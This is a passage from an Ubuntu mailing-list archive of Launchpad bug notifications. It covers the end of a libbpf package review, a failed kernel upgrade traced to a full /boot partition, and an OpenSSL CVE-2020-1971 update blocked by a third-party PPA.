  similar to the kernel for security. Research uncovered no records about
  security issues.

  [Quality assurance]
  At this point there are no open bug reports against libbpf (except this
  one) in Ubuntu. Also no open bugs found in Debian. Project is taken from
  the kernel source and claims static analysis via LGTM and Coverity. Also
  has CI via Travis (https://travis-ci.com/github/libbpf/libbpf).
  Right now there are no dep-8 tests. Though potentially it should be
  possible to create those, would this really add additional benefit
  beyond having upstream CI?
  A test build on hirsute was showing no warnings beyond lintian
  complaining about things which would be changed if we had delta
  (unstable as series for example). Otherwise was clean.

  [Dependencies]
  libc6: main
  libelf1: main
  zlib1g: main

  [Standards compliance]
  $ lintian --pedantic libbpf_0.3-2.dsc
  P: libbpf source: no-homepage-field
  P: libbpf source: silent-on-rules-requiring-root

  [Maintenance]
  As this is only taking out code from the kernel into a separate library
  package, the maintenance effort should be minimal. Packaging is done in
  Debian and is synced into Ubuntu (no delta).

  [Background information]
  A discourse about why this is packaged outside the kernel can be found
  at https://lwn.net/Articles/836911/.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/iproute2/+bug/1910576/+subscriptions



[Touch-packages] [Bug 1911836] Re: package linux-image-5.4.0-62-generic 5.4.0-62.70 failed to install/upgrade: run-parts: /etc/kernel/postinst.d/initramfs-tools exited with return code 1

2021-01-14 Thread Seth Arnold
Hello, I think the core of your problem is this:

Error 24 : Write error : cannot write compressed block

Caused by a full /boot:

/dev/sda2  483946 424596 34365  93% /boot


Truncate a few older files in /boot (start a shell via sudo -s, then find
files with ls -l, then use `> vmlinux-whatever` to truncate files from an
old kernel).

Once you've truncated a kernel and symbols file, you probably have
enough disk space free to run:

sudo apt install -f
sudo apt autoremove

Thanks

** Information type changed from Private Security to Public

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to initramfs-tools in Ubuntu.
https://bugs.launchpad.net/bugs/1911836

Title:
  package linux-image-5.4.0-62-generic 5.4.0-62.70 failed to
  install/upgrade: run-parts: /etc/kernel/postinst.d/initramfs-tools
  exited with return code 1

Status in initramfs-tools package in Ubuntu:
  New

Bug description:
  Possibly related to https://bugs.launchpad.net/ubuntu/+bug/1911835

  These just happened during the same update cycle.

  ProblemType: Package
  DistroRelease: Ubuntu 20.04
  Package: linux-image-5.4.0-62-generic 5.4.0-62.70
  ProcVersionSignature: Ubuntu 5.4.0-60.67-generic 5.4.78
  Uname: Linux 5.4.0-60-generic x86_64
  ApportVersion: 2.20.11-0ubuntu27.14
  Architecture: amd64
  CasperMD5CheckResult: skip
  Date: Thu Jan 14 21:19:12 2021
  ErrorMessage: run-parts: /etc/kernel/postinst.d/initramfs-tools exited with return code 1
  HibernationDevice: RESUME=UUID=b9d6e51c-6ef1-4b05-916a-17aa1a75141c
  InstallationDate: Installed on 2016-07-02 (1657 days ago)
  InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 (20160420.1)
  MachineType: LENOVO 80K9
  ProcFB: 0 i915drmfb
  ProcKernelCmdLine: BOOT_IMAGE=/vmlinuz-5.4.0-60-generic root=/dev/mapper/ubuntu--vg-root ro quiet splash vt.handoff=7
  PulseList: Error: command ['pacmd', 'list'] failed with exit code 1: No PulseAudio daemon running, or not running as session daemon.
  Python3Details: /usr/bin/python3.8, Python 3.8.5, python3-minimal, 3.8.2-0ubuntu2
  PythonDetails: /usr/bin/python2.7, Python 2.7.18, python-is-python2, 2.7.17-4
  RelatedPackageVersions: grub-pc 2.04-1ubuntu26.7
  SourcePackage: initramfs-tools
  Title: package linux-image-5.4.0-62-generic 5.4.0-62.70 failed to install/upgrade: run-parts: /etc/kernel/postinst.d/initramfs-tools exited with return code 1
  UpgradeStatus: Upgraded to focal on 2020-12-06 (39 days ago)
  dmi.bios.date: 07/21/2015
  dmi.bios.vendor: Lenovo
  dmi.bios.version: A9CN61WW
  dmi.board.asset.tag: No Asset Tag
  dmi.board.name: Lenovo Edge 15
  dmi.board.vendor: LENOVO
  dmi.board.version: SDK0J40700 WIN
  dmi.chassis.asset.tag: No Asset Tag
  dmi.chassis.type: 10
  dmi.chassis.vendor: LENOVO
  dmi.chassis.version: Lenovo Edge 15
  dmi.modalias: dmi:bvnLenovo:bvrA9CN61WW:bd07/21/2015:svnLENOVO:pn80K9:pvrLenovoEdge15:rvnLENOVO:rnLenovoEdge15:rvrSDK0J40700WIN:cvnLENOVO:ct10:cvrLenovoEdge15:
  dmi.product.family: IDEAPAD
  dmi.product.name: 80K9
  dmi.product.sku: LENOVO_MT_80K9_BU_idea_FM_Lenovo Edge 15
  dmi.product.version: Lenovo Edge 15
  dmi.sys.vendor: LENOVO

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/initramfs-tools/+bug/1911836/+subscriptions



[Touch-packages] [Bug 1908733] Re: CVE-2020-1971 OpenSSL package upgrade issue

2020-12-22 Thread Seth Arnold
Hello, you've replaced the Ubuntu OpenSSL packages with Ondrej's OpenSSL
packages. You can ask him if he has performed the corresponding update
yet: https://github.com/oerdnj/deb.sury.org

Thanks

** Information type changed from Private Security to Public Security

** Changed in: openssl (Ubuntu)
   Status: New => Invalid

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1908733

Title:
  CVE-2020-1971 OpenSSL package upgrade issue

Status in openssl package in Ubuntu:
  Invalid

Bug description:
  Hello,

  I have tested it on 4 virtual machines (details below):

  # uname -a
  Linux web2 4.15.0-128-generic #131-Ubuntu SMP Wed Dec 9 06:57:35 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

  # lsb_release -rd
  Description:    Ubuntu 18.04.5 LTS
  Release:        18.04

  $ apt-cache policy openssl
  openssl:
    Installed: 1.1.1g-1+ubuntu18.04.1+deb.sury.org+1
    Candidate: 1.1.1g-1+ubuntu18.04.1+deb.sury.org+1
    Version table:
   *** 1.1.1g-1+ubuntu18.04.1+deb.sury.org+1 500
          500 http://ppa.launchpad.net/ondrej/apache2/ubuntu bionic/main amd64 Packages
          100 /var/lib/dpkg/status
       1.1.1g-1+ubuntu18.04.1+deb.sury.org+1 500
          500 http://ppa.launchpad.net/ondrej/php/ubuntu bionic/main amd64 Packages
       1.1.1-1ubuntu2.1~18.04.7 500
          500 http://il.archive.ubuntu.com/ubuntu bionic-updates/main amd64 Packages
          500 http://security.ubuntu.com/ubuntu bionic-security/main amd64 Packages
       1.1.0g-2ubuntu4 500
          500 http://il.archive.ubuntu.com/ubuntu bionic/main amd64 Packages


  My OpenSSL version is: openssl 1.1.1g-1+ubuntu18.04.1+deb.sury.org+1

  I wanted to install patch to fix "CVE-2020-1971" on my virtual
  machines. But found next issue: there is article (
  https://ubuntu.com/security/CVE-2020-1971) with package name
  (version), where "CVE-2020-1971" issues is fixed -->
  "1.1.1-1ubuntu2.1~18.04.7".

  Normal (expected?) behaviour for me (in my case) is to do next:

  sudo apt update
  sudo apt upgrade

  After this all packages in my system should be upgraded to latest
  versions.

  But in fact - OpenSSL package remained same
  1.1.1g-1+ubuntu18.04.1+deb.sury.org+1

  When I check:

  $ apt list openssl
  Listing... Done
  openssl/bionic,now 1.1.1g-1+ubuntu18.04.1+deb.sury.org+1 amd64 [installed]
  N: There are 3 additional versions. Please use the '-a' switch to see them.

  $ apt list openssl -a
  Listing... Done
  openssl/bionic,now 1.1.1g-1+ubuntu18.04.1+deb.sury.org+1 amd64 [installed]
  openssl/bionic 1.1.1g-1+ubuntu18.04.1+deb.sury.org+1 amd64
  openssl/bionic-updates,bionic-security 1.1.1-1ubuntu2.1~18.04.7 amd64
  openssl/bionic 1.1.0g-2ubuntu4 amd64

  Ok, lets install latest package --> 1.1.1-1ubuntu2.1~18.04.7:

  sudo apt install openssl=1.1.1-1ubuntu2.1~18.04.7

  And here I receive next:

  
  Reading package lists... Done
  Building dependency tree
  Reading state information... Done
  The following packages will be DOWNGRADED:
    openssl
  0 upgraded, 0 newly installed, 1 downgraded, 0 to remove and 0 not upgraded.
  Need to get 614 kB of archives.
  After this operation, 132 kB disk space will be freed.
  Do you want to continue? [Y/n] yn
  Get:1 http://il.archive.ubuntu.com/ubuntu bionic-updates/main amd64 openssl amd64 1.1.1-1ubuntu2.1~18.04.7 [614 kB]
  Fetched 614 kB in 0s (1,367 kB/s)
  dpkg: warning: downgrading openssl from 1.1.1g-1+ubuntu18.04.1+deb.sury.org+1 to 1.1.1-1ubuntu2.1~18.04.7

  Is this correct behavior? Why newest version (mentioned in
  https://ubuntu.com/security/CVE-2020-1971) considered as DOWNGRADE?

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1908733/+subscriptions


